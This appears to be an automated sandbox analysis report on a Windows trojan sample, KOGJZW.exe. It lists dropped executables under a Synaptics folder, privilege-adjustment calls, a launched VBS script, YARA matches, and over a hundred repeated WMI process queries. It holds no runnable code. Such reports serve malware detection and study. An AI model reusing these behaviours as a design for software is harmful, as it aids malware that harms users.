Source: Synaptics.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Source: Synaptics.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCX97B8.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.3.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Source: KOGJZW.exe, 00000000.00000002.1335771155.0000000000745000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs KOGJZW.exe
Source: KOGJZW.exe, 00000000.00000000.1325660600.00000000004A5000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameb! vs KOGJZW.exe
Source: KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb! vs KOGJZW.exe
Source: KOGJZW.exe, 00000000.00000003.1335402421.0000000000716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs KOGJZW.exe
Source: KOGJZW.exe, 00000000.00000000.1325538739.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs KOGJZW.exe
Source: KOGJZW.exe	Binary or memory string: OriginalFileName vs KOGJZW.exe

Source: KOGJZW.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@23/46@7/4

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0045D712 GetLastError,FormatMessageW,

2_2_0045D712

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0044B8B0 AdjustTokenPrivileges,CloseHandle,	2_2_0044B8B0
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0044BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_0044BEC3
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003BB8B0 AdjustTokenPrivileges,CloseHandle,	9_2_003BB8B0
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003BBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	9_2_003BBEC3

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0045EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

2_2_0045EA85

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_00456F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

2_2_00456F5B

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0045EFCD CoInitialize,CoCreateInstance,CoUninitialize,

2_2_0045EFCD

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_004131F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

2_2_004131F2

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: C:\Users\user\Desktop\KOGJZW.exe

File created: C:\Users\user\Desktop\._cache_KOGJZW.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_03
Source: C:\ProgramData\Synaptics\Synaptics.exe	Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7936

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

File created: C:\Users\user\AppData\Local\Temp\WSFDII.vbs

Jump to behavior

Source: Yara match	File source: KOGJZW.exe, type: SAMPLE
Source: Yara match	File source: 0.0.KOGJZW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1325538739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX97B8.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs

Source: C:\Users\user\Desktop\KOGJZW.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
